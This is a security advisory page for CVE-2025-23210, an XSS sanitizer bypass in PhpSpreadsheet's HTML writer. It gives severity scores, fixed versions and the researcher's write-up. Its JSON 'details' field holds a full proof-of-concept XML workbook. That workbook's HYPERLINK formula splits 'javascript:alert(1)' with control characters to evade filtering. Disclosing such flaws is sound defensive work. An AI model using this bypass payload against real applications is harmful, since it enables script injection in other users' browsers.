ghsa-r57h-547h-w24f
Vulnerability from github
Published
2025-02-03 15:39
Modified
2025-02-04 17:22
Severity ?
5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.8 (Medium) - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
Summary
PhpSpreadsheet allows bypassing of XSS sanitizer using the javascript protocol and special characters
Details

Product: PhpSpreadsheet Version: 3.8.0 CWE-ID: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') CVSS vector v.3.1: 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) CVSS vector v.4.0: 4.8 (AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N) Description: an attacker can use special characters, so that the library processes the javascript protocol with special characters and generates an HTML link Impact: executing arbitrary JavaScript code in the browser Vulnerable component: class PhpOffice\PhpSpreadsheet\Writer\Html, method generateRow Exploitation conditions: a user viewing a specially generated xml file Mitigation: additional sanitization of special characters in a string Researcher: Igor Sak-Sakovskiy (Positive Technologies)

Research

The researcher discovered zero-day vulnerability Bypass XSS sanitizer using the javascript protocol and special characters in Phpspreadsheet. The following code is written on the server, which translates the XML file into an HTML representation and displays it in the response.

Listing 4. Source code on the server

```

load($inputFileName); $writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet); print($writer->generateHTMLAll()); ``` The contents of the xml file - `./doc/file.xml` *Listing 5. The contents of the xml file* ```

author author 2015-06-05T18:19:34Z 2024-12-25T10:16:07Z 16.00 11020 19420 32767 32767 False False


1 3 6 False False ```

Due to the load with a special character in front of the javascript protocol, the execution flow hits line 1595, not 1593.

Figure 4. Generating a link bypassing a regular expression

In the response from the server, you can see which special character is located in front of the javascript protocol after conversion.

Figure 5. Response from the server with a special character

When viewing the rendered result, a link becomes visible in the browser, and when clicked, the embedded JavaScript code will be executed.

Figure 6. Executing JavaScript code

Credit

Igor Sak-Sakovskiy (Positive Technologies)

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.29.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.2.0"
            },
            {
              "fixed": "2.3.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.1.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-23210"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-02-03T15:39:31Z",
    "nvd_published_at": "2025-02-03T22:15:28Z",
    "severity": "MODERATE"
  },
  "details": "**Product:** PhpSpreadsheet\n**Version:** 3.8.0\n**CWE-ID:** CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\n**CVSS vector v.3.1:** 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)\n**CVSS vector v.4.0:** 4.8 (AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N)\n**Description:** an attacker can use special characters, so that the library processes the javascript protocol with special characters and generates an HTML link\n**Impact:** executing arbitrary JavaScript code in the browser\n**Vulnerable component:** class `PhpOffice\\PhpSpreadsheet\\Writer\\Html`, method `generateRow`\n**Exploitation conditions:** a user viewing a specially generated xml file\n**Mitigation:** additional sanitization of special characters in a string\n**Researcher: Igor Sak-Sakovskiy (Positive Technologies)**\n\n# Research\n\nThe researcher discovered zero-day vulnerability Bypass XSS sanitizer using the javascript protocol and special characters in Phpspreadsheet.\nThe following code is written on the server, which translates the XML file into an HTML representation and displays it in the response.\n\n*Listing 4. Source code on the server*\n\n```\n\u003c?php\n\nrequire __DIR__ . \u0027/vendor/autoload.php\u0027;\n\n$inputFileType = \u0027Xml\u0027;\n$reader = \\PhpOffice\\PhpSpreadsheet\\IOFactory::createReader($inputFileType);  \n\n$inputFileName = \u0027./doc/file.xml\u0027;\n$spreadsheet = $reader-\u003eload($inputFileName); \n \n$writer = new \\PhpOffice\\PhpSpreadsheet\\Writer\\Html($spreadsheet); \nprint($writer-\u003egenerateHTMLAll());\n```\nThe contents of the xml file - `./doc/file.xml`\n\n*Listing 5. The contents of the xml file*\n```\n\u003c?xml version=\"1.0\"?\u003e \n\u003c?mso-application progid=\"Excel.Sheet\"?\u003e \n\u003cWorkbook xmlns=\"urn:schemas-microsoft-com:office:spreadsheet\" \n xmlns:o=\"urn:schemas-microsoft-com:office:office\" \n xmlns:x=\"urn:schemas-microsoft-com:office:excel\" \n xmlns:ss=\"urn:schemas-microsoft-com:office:spreadsheet\" \n xmlns:html=\"http://www.w3.org/TR/REC-html40\"\u003e \n \u003cDocumentProperties xmlns=\"urn:schemas-microsoft-com:office:office\"\u003e \n  \u003cAuthor\u003eauthor\u003c/Author\u003e \n  \u003cLastAuthor\u003eauthor\u003c/LastAuthor\u003e \n  \u003cCreated\u003e2015-06-05T18:19:34Z\u003c/Created\u003e \n  \u003cLastSaved\u003e2024-12-25T10:16:07Z\u003c/LastSaved\u003e \n  \u003cVersion\u003e16.00\u003c/Version\u003e \n \u003c/DocumentProperties\u003e \n \u003cOfficeDocumentSettings xmlns=\"urn:schemas-microsoft-com:office:office\"\u003e \n  \u003cAllowPNG/\u003e \n \u003c/OfficeDocumentSettings\u003e \n \u003cExcelWorkbook xmlns=\"urn:schemas-microsoft-com:office:excel\"\u003e \n  \u003cWindowHeight\u003e11020\u003c/WindowHeight\u003e \n  \u003cWindowWidth\u003e19420\u003c/WindowWidth\u003e \n  \u003cWindowTopX\u003e32767\u003c/WindowTopX\u003e \n  \u003cWindowTopY\u003e32767\u003c/WindowTopY\u003e \n  \u003cProtectStructure\u003eFalse\u003c/ProtectStructure\u003e \n  \u003cProtectWindows\u003eFalse\u003c/ProtectWindows\u003e \n \u003c/ExcelWorkbook\u003e \n \u003cStyles\u003e \n  \u003cStyle ss:ID=\"Default\" ss:Name=\"Normal\"\u003e \n   \u003cAlignment ss:Vertical=\"Bottom\"/\u003e \n   \u003cBorders/\u003e \n   \u003cFont ss:FontName=\"Calibri\" x:Family=\"Swiss\" ss:Size=\"11\" ss:Color=\"#000000\"/\u003e \n   \u003cInterior/\u003e \n   \u003cNumberFormat/\u003e \n   \u003cProtection/\u003e \n  \u003c/Style\u003e \n  \u003cStyle ss:ID=\"s16\"\u003e \n   \u003cNumberFormat ss:Format=\"General Date\"/\u003e \n  \u003c/Style\u003e \n \u003c/Styles\u003e \n \u003cWorksheet ss:Name=\"\u041b\u0438\u0441\u04421\"\u003e \n  \u003cTable ss:ExpandedColumnCount=\"2\" ss:ExpandedRowCount=\"6\" x:FullColumns=\"1\" \n   x:FullRows=\"1\" ss:DefaultRowHeight=\"14.5\"\u003e \n   \u003cColumn ss:AutoFitWidth=\"0\" ss:Width=\"194\"/\u003e \n   \u003cRow\u003e \n     \u003cCell ss:Formula=\"=HYPERLINK (CHAR(20) \u0026amp; \u0026quot;j\u0026quot; \u0026amp; CHAR(13) \u0026amp; \u0026quot;avascript:alert(1)\u0026quot;)\"\u003e\u003cData ss:Type=\"String\"\u003e\u003c/Data\u003e\u003c/Cell\u003e \n   \u003c/Row\u003e \n  \u003c/Table\u003e \n  \u003cWorksheetOptions xmlns=\"urn:schemas-microsoft-com:office:excel\"\u003e \n   \u003cPageSetup\u003e \n    \u003cHeader x:Margin=\"0.3\"/\u003e \n    \u003cFooter x:Margin=\"0.3\"/\u003e \n    \u003cPageMargins x:Bottom=\"0.75\" x:Left=\"0.7\" x:Right=\"0.7\" x:Top=\"0.75\"/\u003e \n   \u003c/PageSetup\u003e \n   \u003cSelected/\u003e \n   \u003cTopRowVisible\u003e1\u003c/TopRowVisible\u003e \n   \u003cPanes\u003e \n    \u003cPane\u003e \n     \u003cNumber\u003e3\u003c/Number\u003e \n     \u003cActiveRow\u003e6\u003c/ActiveRow\u003e \n    \u003c/Pane\u003e \n   \u003c/Panes\u003e \n   \u003cProtectObjects\u003eFalse\u003c/ProtectObjects\u003e \n   \u003cProtectScenarios\u003eFalse\u003c/ProtectScenarios\u003e \n  \u003c/WorksheetOptions\u003e \n \u003c/Worksheet\u003e\n\u003c/Workbook\u003e\n```\n\nDue to the load with a special character in front of the javascript protocol, the execution flow hits line 1595, not 1593.\n \n*Figure 4. Generating a link bypassing a regular expression*\n![fig4](https://github.com/user-attachments/assets/9bd2299d-9045-4cab-b3a5-cbcaf3bbe23c)\n\nIn the response from the server, you can see which special character is located in front of the javascript protocol after conversion.\n \n*Figure 5. Response from the server with a special character*\n![fig5](https://github.com/user-attachments/assets/3fecbd9b-b08e-4797-9f5d-06911f857059)\n\nWhen viewing the rendered result, a link becomes visible in the browser, and when clicked, the embedded JavaScript code will be executed.\n\n*Figure 6. Executing JavaScript code*\n\u003cimg width=\"595\" alt=\"fig6\" src=\"https://github.com/user-attachments/assets/b8ff1aeb-ba3b-49c1-a3b4-9e2cc1fc52d1\" /\u003e\n_____________________________________________\n\n## Credit\n\nIgor Sak-Sakovskiy (Positive Technologies)",
  "id": "GHSA-r57h-547h-w24f",
  "modified": "2025-02-04T17:22:14Z",
  "published": "2025-02-03T15:39:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-r57h-547h-w24f"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23210"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/cde2926a9e2baf146783f8fd1771bbed7d1dc7b3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "PhpSpreadsheet allows bypassing of XSS sanitizer using the javascript protocol and special characters"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.